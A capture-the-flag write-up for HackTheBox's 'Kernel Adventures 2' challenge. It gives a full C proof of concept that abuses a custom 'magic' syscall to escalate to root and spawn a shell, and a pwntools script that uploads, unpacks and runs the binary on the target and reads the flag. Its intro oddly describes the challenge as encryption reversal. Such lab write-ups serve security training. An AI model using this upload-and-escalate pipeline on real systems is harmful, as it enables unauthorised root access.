HackTheBox Kernel Adventures 2 Challenge
Explore the basics of cybersecurity in the Kernel Adventures 2 Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/258
Description
Apparently Linux authentication is done in userspace? That doesn’t sound safe, time to do it all in the kernel!
Exploitation
Examining the kernel diff, we notice that several new syscalls have been added, including one named `magic` with syscall number 449.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#define MAX_USERS 65535
#define MAGIC_SYS 449
void do_add(char* username, char* password) {
    /* Invoke the custom syscall with sub-command 0 (the operation this
       wrapper is named for) on the given username/password pair.  The
       syscall's return value is deliberately not inspected. */
    long rc = syscall(MAGIC_SYS, 0, username, password);
    (void)rc;
}
void do_delete(char* username) {
    /* Invoke the custom syscall with sub-command 2 (the operation this
       wrapper is named for) for the given username.  Only the username is
       passed; the return value is not inspected. */
    long rc = syscall(MAGIC_SYS, 2, username);
    (void)rc;
}
void do_switch(char* username, char* password) {
    /* Invoke the custom syscall with sub-command 3 (the operation this
       wrapper is named for) on the given username/password pair.  The
       return value is not inspected. */
    long rc = syscall(MAGIC_SYS, 3, username, password);
    (void)rc;
}
int main() {
    /* Credentials handed to the add/switch sub-commands below. */
    char *user = "pwn";
    char *pass = "12pwn34";
    /* MAX_USERS iterations: every iteration adds the user, and every
       iteration except the last deletes it again.  None of the wrapper
       calls report whether the syscall succeeded. */
    for (int i = 0; i < MAX_USERS; i++) {
        do_add(user, pass);
        if (i == MAX_USERS - 1) {
            /* Final iteration: keep the user, switch to it and replace this
               process with /bin/sh (empty environment).  execve only returns
               on failure, in which case main returns 0 without reporting
               the error. */
            do_switch(user, pass);
            char *args[] = {"/bin/sh", NULL};
            execve(args[0], args, NULL);
            return 0;
        }
        do_delete(user);
    }
    /* NOTE(review): unreachable -- the loop above always returns on its
       final iteration (i == MAX_USERS - 1).  Also, 0xFFFFFFFF is an unsigned
       constant (it does not fit a 32-bit int), so the comparison is done in
       unsigned arithmetic and a 32-bit signed i can only reach the bound
       after overflow; in practice this loop could end only via the return
       inside it. */
    for (int i = 0; i < 0xFFFFFFFF; i++) {
        /* Retry the add sub-command until it returns 0. */
        if (syscall(MAGIC_SYS, 0, user, pass) == 0) {
            do_switch(user, pass);
            char *args[] = {"/bin/sh", NULL};
            execve(args[0], args, NULL);
            return 0;
        }
        do_delete(user);
    }
    return 0;
}
Compile with musl to produce a more compact static binary.
musl-gcc -static -march=x86-64 -Os poc.c -o expl
Use this script to upload, decompress and execute the PoC, and to get an interactive session as root.
#!/usr/bin/python3
from pwn import *
import base64,gzip
def get_process():
    """Open a pwntools ``remote`` connection to the ``ip:port`` target in ``sys.argv[1]``.

    If the argument is missing (``sys.argv[1]`` raises ``IndexError``), a usage
    line is printed and the script exits with status 1.  A malformed argument
    (no ``:`` or a non-numeric port) is not handled here and raises ``ValueError``.
    """
    try:
        host, port_str = sys.argv[1].split(':')
        conn = remote(host, int(port_str))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)
    return conn
# Send the compiled PoC (`expl`) to the target through the shell connection,
# reassemble it there, run it, and hand the session to the user.
chunk_size = 256  # base64 bytes sent per `echo` line
file_name = 'expl'
file_name_encoded = file_name.encode()  # bytes form, for concatenation with the byte-string commands
with open(file_name, 'rb') as inf:
    exploit = inf.read()
# gzip-compressed, then base64-encoded so the payload is plain text for the echo commands below
data = base64.b64encode(gzip.compress(exploit))
conn = get_process()
n_chunks = (len(data) + chunk_size - 1) // chunk_size  # ceiling division
for i in range(n_chunks):
    print(f'Uploading the exploit: {i + 1}/{n_chunks}')
    # Wait for the shell prompt, then append one chunk to the remote .base64 file.
    conn.recvuntil(b'$')
    conn.sendline(b'echo ' + data[chunk_size*i: (i+1)*chunk_size] + b' >> /home/user/' + file_name_encoded + b'.base64')
# NOTE(review): redundant -- the last loop iteration already printed n_chunks/n_chunks.
print('Uploading the exploit: ' + str(n_chunks) + '/' + str(n_chunks))
# NOTE(review): no recvuntil precedes this sendline, so from here each recvuntil
# consumes the prompt left by the command sent one step earlier; the shell still
# executes the commands in the order they are sent.
conn.sendline(b'cat /home/user/' + file_name_encoded + b'.base64 | base64 -d > /home/user/' + file_name_encoded + b'.gz')  # base64 -> .gz
conn.recvuntil(b'$')
conn.sendline(b'cat /home/user/' + file_name_encoded + b'.gz | gzip -d > /home/user/' + file_name_encoded)  # .gz -> binary
conn.recvuntil(b'$')
conn.sendline(b'chmod +x /home/user/' + file_name_encoded)  # make the binary executable
conn.recvuntil(b'$')
conn.sendline(b'/home/user/' + file_name_encoded)  # run the PoC
conn.interactive()  # hand the session over to the user
cat /flag.txt
Summary
The Kernel Adventures: Part 2 Challenge on Hack The Box dives into kernel exploitation with a focus on syscall manipulation. This medium-level challenge introduces a custom magic syscall, enabling privilege escalation through user management. By leveraging compact PoC binaries and an efficient upload-execute pipeline, the challenge offers a hands-on experience in advanced exploitation techniques, culminating in root access and system compromise. Perfect for refining skills in kernel-level hacking.